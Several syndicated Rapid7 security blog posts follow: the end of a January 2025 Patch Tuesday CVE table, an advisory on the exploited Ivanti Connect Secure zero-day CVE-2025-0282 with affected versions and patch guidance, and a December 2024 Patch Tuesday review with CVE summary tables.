CVE-2024-7344	Cert CC: CVE-2024-7344 Howyar Taiwan Secure Boot Bypass	No	No	6.7
CVE-2025-21249	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21255	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21258	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21260	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21263	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21265	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21327	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21341	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21226	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21227	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21228	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21229	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21232	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21256	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21261	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21310	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21324	Windows Digital Media Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-21308	Windows Themes Spoofing Vulnerability	No	Yes	6.5
CVE-2025-21217	Windows NTLM Spoofing Vulnerability	No	No	6.5
CVE-2025-21272	Windows COM Server Information Disclosure Vulnerability	No	No	6.5
CVE-2025-21288	Windows COM Server Information Disclosure Vulnerability	No	No	6.5
CVE-2025-21278	Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability	No	No	6.2
CVE-2025-21242	Windows Kerberos Information Disclosure Vulnerability	No	No	5.9
CVE-2025-21336	Windows Cryptographic Information Disclosure Vulnerability	No	No	5.6
CVE-2025-21316	Windows Kernel Memory Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21318	Windows Kernel Memory Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21319	Windows Kernel Memory Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21320	Windows Kernel Memory Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21321	Windows Kernel Memory Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21274	Windows Event Tracing Denial of Service Vulnerability	No	No	5.5
CVE-2025-21374	Windows CSC Service Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21215	Secure Boot Security Feature Bypass Vulnerability	No	No	4.6
CVE-2025-21213	Secure Boot Security Feature Bypass Vulnerability	No	No	4.6
CVE-2025-21269	Windows HTML Platforms Security Feature Bypass Vulnerability	No	No	4.3
CVE-2025-21268	MapUrlToZone Security Feature Bypass Vulnerability	No	No	4.3
CVE-2025-21329	MapUrlToZone Security Feature Bypass Vulnerability	No	No	4.3
CVE-2025-21328	MapUrlToZone Security Feature Bypass Vulnerability	No	No	4.3
CVE-2025-21189	MapUrlToZone Security Feature Bypass Vulnerability	No	No	4.3
CVE-2025-21332	MapUrlToZone Security Feature Bypass Vulnerability	No	No	4.3
CVE-2025-21210	Windows BitLocker Information Disclosure Vulnerability	No	No	4.2
CVE-2025-21214	Windows BitLocker Information Disclosure Vulnerability	No	No	4.2
CVE-2025-21312	Windows Smart Card Reader Information Disclosure Vulnerability	No	No	2.4

ESU Windows Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21338	GDI+ Remote Code Execution Vulnerability	No	No	7.8

Microsoft Dynamics vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21187	Microsoft Power Automate Remote Code Execution Vulnerability	No	No	7.8

Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21385	Microsoft Purview Information Disclosure Vulnerability	No	No	8.8
CVE-2025-21363	Microsoft Word Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21344	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21361	Microsoft Outlook Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21345	Microsoft Office Visio Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21356	Microsoft Office Visio Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21365	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21402	Microsoft Office OneNote Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21364	Microsoft Excel Security Feature Bypass Vulnerability	No	No	7.8
CVE-2025-21354	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21362	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21360	Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21366	Microsoft Access Remote Code Execution Vulnerability	No	Yes	7.8
CVE-2025-21395	Microsoft Access Remote Code Execution Vulnerability	No	Yes	7.8
CVE-2025-21186	Microsoft Access Remote Code Execution Vulnerability	No	Yes	7.8
CVE-2025-21348	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	7.2
CVE-2025-21346	Microsoft Office Security Feature Bypass Vulnerability	No	No	7.1
CVE-2025-21357	Microsoft Outlook Remote Code Execution Vulnerability	No	No	6.7
CVE-2025-21393	Microsoft SharePoint Server Spoofing Vulnerability	No	No	6.3

Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21311	Windows NTLM V1 Elevation of Privilege Vulnerability	No	No	9.8
CVE-2025-21239	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21241	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21248	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21292	Windows Search Service Elevation of Privilege Vulnerability	No	No	8.8
CVE-2025-21291	Windows Direct Show Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21224	Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-21370	Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21234	Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21235	Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21335	Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-21333	Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-21334	Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-21382	Windows Graphics Component Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21271	Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21275	Windows App Package Installer Elevation of Privilege Vulnerability	No	Yes	7.8
CVE-2025-21304	Microsoft DWM Core Library Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21315	Microsoft Brokering File System Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21372	Microsoft Brokering File System Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21326	Internet Explorer Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21343	Windows Web Threat Defense User Service Information Disclosure Vulnerability	No	No	7.5
CVE-2025-21330	Windows Remote Desktop Services Denial of Service Vulnerability	No	No	7.5
CVE-2025-21207	Windows Connected Devices Platform Service (Cdpsvc) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21299	Windows Kerberos Security Feature Bypass Vulnerability	No	No	7.1
CVE-2025-21314	Windows SmartScreen Spoofing Vulnerability	No	No	6.5
CVE-2025-21313	Windows Security Account Manager (SAM) Denial of Service Vulnerability	No	No	6.5
CVE-2025-21301	Windows Geolocation Service Information Disclosure Vulnerability	No	No	6.5
CVE-2025-21193	Active Directory Federation Server Spoofing Vulnerability	No	No	6.5
CVE-2025-21202	Windows Recovery Environment Agent Elevation of Privilege Vulnerability	No	No	6.1
CVE-2025-21225	Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability	No	No	5.9
CVE-2025-21257	Windows WLAN AutoConfig Service Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21340	Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability	No	No	5.5
CVE-2025-21280	Windows Virtual Trusted Platform Module Denial of Service Vulnerability	No	No	5.5
CVE-2025-21284	Windows Virtual Trusted Platform Module Denial of Service Vulnerability	No	No	5.5
CVE-2025-21317	Windows Kernel Memory Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21323	Windows Kernel Memory Information Disclosure Vulnerability	No	No	5.5
CVE-2025-21219	MapUrlToZone Security Feature Bypass Vulnerability	No	No	4.3

CVE-2025-0282: Ivanti Connect Secure zero-day exploited in the wild

2025-01-08 Caitlin Condon

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2025/01/08/etr-cve-2025-0282-ivanti-connect-secure-zero-day-exploited-in-the-wild/

CVE-2025-0282: Ivanti Connect Secure zero-day exploited in the wild

On Wednesday, January 8, 2025, Ivanti disclosed two CVEs affecting Ivanti Connect Secure, Policy Secure, and Neurons for ZTA gateways. CVE-2025-0282 is a stack-based buffer overflow vulnerability that allows remote, unauthenticated attackers to execute code on the target device. CVE-2025-0283 is a stack-based buffer overflow that allows local authenticated attackers to escalate privileges on the device.

Ivanti’s advisory indicates that CVE-2025-0282 has been exploited in the wild against a limited number of Connect Secure devices. Per the vendor, Ivanti Policy Secure and Neurons for ZTA are not known to have been exploited in the wild at time of disclosure. Google’s Mandiant division and Microsoft’s Threat Intelligence Center (MSTIC) are credited with the discovery of the two issues, which almost certainly means further intelligence will be released soon on one or more zero-day threat campaigns targeting Ivanti devices.

Ivanti also has a short blog available on the new CVEs here.

Mitigation guidance

The following products and versions are vulnerable to CVE-2025-0282:

Ivanti Connect Secure 22.7R2 through 22.7R2.4
Ivanti Policy Secure 22.7R1 through 22.7R1.2
Ivanti Neurons for ZTA 22.7R2 through 22.7R2.3

The following products and versions are vulnerable to CVE-2025-0283:

Ivanti Connect Secure 22.7R2.4 and prior, 9.1R18.9 and prior
Ivanti Policy Secure 22.7R1.2 and prior
Ivanti Neurons for ZTA 22.7R2.3 and prior

Ivanti has a full table of affected versions and corresponding solution estimates in its advisory. As of 1 PM ET on Wednesday, January 8, patches are available for both CVEs in Ivanti Connect Secure (22.7R2.5), but the CVEs are unpatched in Ivanti Policy Secure and Neurons for ZTA (patches appear to be expected January 21, 2025, per the advisory).

Customers should apply available Ivanti Connect Secure patches immediately, without waiting for a typical patch cycle to occur. Ivanti’s advisory notes that “Exploitation of CVE-2025-0282 can be identified by the Integrity Checker Tool (ICT). We strongly advise all customers to closely monitor their internal and external ICT as a part of a robust and layered approach to cybersecurity to ensure the integrity and security of the entire network infrastructure.”

For the latest information, please refer to the vendor advisory.

Rapid7 customers

Our VM engineering team is researching options for coverage of CVE-2025-0282 and CVE-2025-0283 in Ivanti Connect Secure and expects vulnerability checks to be available to InsightVM and Nexpose customers no later than Thursday, January 9, 2025.

Patch Tuesday – December 2024

2024-12-11 Adam Barnett

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2024/12/10/patch-tuesday-december-2024/

Patch Tuesday - December 2024

Microsoft is addressing 70 vulnerabilities this December 2024 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation and public disclosure for one of the vulnerabilities published today, and this is reflected in a CISA KEV entry. For the third month in a row, Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication. Today sees the publication of 16 critical remote code execution (RCE) vulnerabilities, which is more than usual. Two browser vulnerabilities have already been published separately this month, and are not included in the total.

Common Log File System: zero-day EoP

This month’s zero-day vulnerability is CVE-2024-49138, an elevation of privilege vulnerability in the Windows Common Log File System (CLFS) driver, a general-purpose Windows logging service that can be used by software clients running in user-mode or kernel-mode. Exploitation leads to SYSTEM privileges, and if this all sounds familiar, it should.

There have been a series of zero-day elevation of privilege vulnerabilities in CLFS over the past few years. Past offenders are CVE-2022-24521, CVE-2023-23376, CVE-2022-37969, and CVE-2023-28252; today’s addition of CVE-2024-49138 is the first CLFS zero-day vulnerability which Microsoft has published in 2024. Although the advisory doesn’t provide much detail on the means of exploitation, the weakness is CWE-122: Heap-based Buffer Overflow, which most commonly leads to crashes/denial of service, but can also lead to code execution.

Ransomware authors who have abused previous CLFS vulnerabilities will be only too pleased to get their hands on a fresh one. Expect more CLFS zero-day vulnerabilities to emerge in the future, unless Microsoft decides to perform a full replacement of the aging CLFS codebase instead of offering spot fixes for specific flaws. Patches are available for all versions of Windows.

Groups of critical RCE

Patterns emerge when we consider the 16 critical RCE vulnerabilities published today as a whole, which might somewhat reduce the level of alarm that unusually large number might otherwise cause weary defenders.

LDAP: critical RCE

A trio of Windows LDAP critical RCE vulnerabilities receive patches this month, including CVE-2024-49112, which has a CVSSv3 base score of 9.8, which is the highest of any of the vulnerabilities which Microsoft has published today. Exploitation is via a specially crafted set of LDAP calls, and leads to code execution within the context of the LDAP service; although the advisory doesn’t specify, the LDAP service runs in a SYSTEM context. Microsoft advises defenders who still permit domain controllers to receive inbound RPC calls from untrusted networks or to access the internet to stop doing that.

LSASS: critical RCE

Another potential cause for concern this month: CVE-2024-49126 is a critical RCE in the Local Security Authority Subsystem Service (LSASS). Exploitation could potentially be carried out remotely, and the attacker needs no privileges, nor does the user need to perform any action; the only silver lining is that an attacker must win a race condition. Although the advisory says that code execution would be in the context of the server’s account, it might be safest to assume that code execution would be in a SYSTEM context.

Hyper-V: container escape

CVE-2024-49117 describes a container escape for Hyper-V; exploitation requires that the attacker make specially crafted file operation requests on the virtual machine (VM) to hardware resources on the VM, which could result in remote code execution on the hypervisor. The FAQ on the advisory sets out that no special privileges are required in the context of the VM, so any level of access is enough to break free from the VM. We also learn that the container escape could be lateral, where an attacker moves from one VM to another, rather than to the hypervisor.

Remote Desktop Services: 8 critical RCEs

All eight critical RCE vulnerabilities in Remote Desktop Services published today (e.g. CVE-2024-49106) share a number of similarities: they have identical CVSS vectors, exploitation requires that an attacker win a race condition, and the same research group is credited in each case.

Microsoft lifecycle update

There are no significant Microsoft product lifecycle transitions this month.

Summary charts

Summary tables

Browser vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2024-49041	Microsoft Edge (Chromium-based) Spoofing Vulnerability	No	No	4.3
CVE-2024-12053	Chromium: CVE-2024-12053 Type Confusion in V8	No	No	N/A

Developer Tools vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2024-49063	Microsoft/Muzic Remote Code Execution Vulnerability	No	No	8.4

Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2024-49068	Microsoft SharePoint Elevation of Privilege Vulnerability	No	No	8.2
CVE-2024-43600	Microsoft Office Elevation of Privilege Vulnerability	No	No	7.8
CVE-2024-49069	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2024-49142	Microsoft Access Remote Code Execution Vulnerability	No	No	7.8
CVE-2024-49070	Microsoft SharePoint Remote Code Execution Vulnerability	No	No	7.4
CVE-2024-49059	Microsoft Office Elevation of Privilege Vulnerability	No	No	7
CVE-2024-49064	Microsoft SharePoint Information Disclosure Vulnerability	No	No	6.5
CVE-2024-49062	Microsoft SharePoint Information Disclosure Vulnerability	No	No	6.5
CVE-2024-49065	Microsoft Office Remote Code Execution Vulnerability	No	No	5.5

System Center vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2024-49057	Microsoft Defender for Endpoint on Android Spoofing Vulnerability	No	No	8.1
CVE-2024-43594	System Center Operations Manager Elevation of Privilege Vulnerability	No	No	7.3

Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2024-49093	Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability	No	No	8.8
CVE-2024-49117	Windows Hyper-V Remote Code Execution Vulnerability	No	No	8.8
CVE-2024-49106	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49108	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49115	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49119	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49123	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49132	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49116	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49076	Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability	No	No	7.8
CVE-2024-49074	Windows Kernel-Mode Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2024-49114	Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2024-49075	Windows Remote Desktop Services Denial of Service Vulnerability	No	No	7.5
CVE-2024-49107	WmsRepair Service Elevation of Privilege Vulnerability	No	No	7.3
CVE-2024-49097	Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability	No	No	7
CVE-2024-49095	Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability	No	No	7
CVE-2024-49073	Windows Mobile Broadband Driver Elevation of Privilege Vulnerability	No	No	6.8
CVE-2024-49092	Windows Mobile Broadband Driver Elevation of Privilege Vulnerability	No	No	6.8
CVE-2024-49077	Windows Mobile Broadband Driver Elevation of Privilege Vulnerability	No	No	6.8
CVE-2024-49078	Windows Mobile Broadband Driver Elevation of Privilege Vulnerability	No	No	6.8
CVE-2024-49083	Windows Mobile Broadband Driver Elevation of Privilege Vulnerability	No	No	6.8
CVE-2024-49110	Windows Mobile Broadband Driver Elevation of Privilege Vulnerability	No	No	6.8
CVE-2024-49094	Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability	No	No	6.6
CVE-2024-49101	Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability	No	No	6.6
CVE-2024-49111	Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability	No	No	6.6
CVE-2024-49081	Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability	No	No	6.6
CVE-2024-49109	Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability	No	No	6.6
CVE-2024-49087	Windows Mobile Broadband Driver Information Disclosure Vulnerability	No	No	4.6
CVE-2024-49098	Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability	No	No	4.3
CVE-2024-49099	Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability	No	No	4.3
CVE-2024-49103	Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability	No	No	4.3

Windows ESU vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2024-49112	Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability	No	No	9.8
CVE-2024-49085	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2024-49086	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2024-49102	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2024-49104	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2024-49125	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2024-49080	Windows IP Routing Management Snapin Remote Code Execution Vulnerability	No	No	8.8
CVE-2024-49120	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49128	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49126	Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49127	Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49122	Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49118	Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49124	Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability	No	No	8.1
CVE-2024-49072	Windows Task Scheduler Elevation of Privilege Vulnerability	No	No	7.8
CVE-2024-49138	Windows Common Log File System Driver Elevation of Privilege Vulnerability	Yes	Yes	7.8
CVE-2024-49088	Windows Common Log File System Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2024-49090	Windows Common Log File System Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2024-49079	Input Method Editor (IME) Remote Code Execution Vulnerability	No	No	7.8
CVE-2024-49129	Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability	No	No	7.5
CVE-2024-49121	Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability	No	No	7.5
CVE-2024-49113	Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability	No	No	7.5
CVE-2024-49096	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2024-49089	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	7.2
CVE-2024-49091	Windows Domain Name Service Remote Code Execution Vulnerability	No	No	7.2
CVE-2024-49084	Windows Kernel Elevation of Privilege Vulnerability	No	No	7
CVE-2024-49082	Windows File Explorer Information Disclosure Vulnerability	No	No	6.8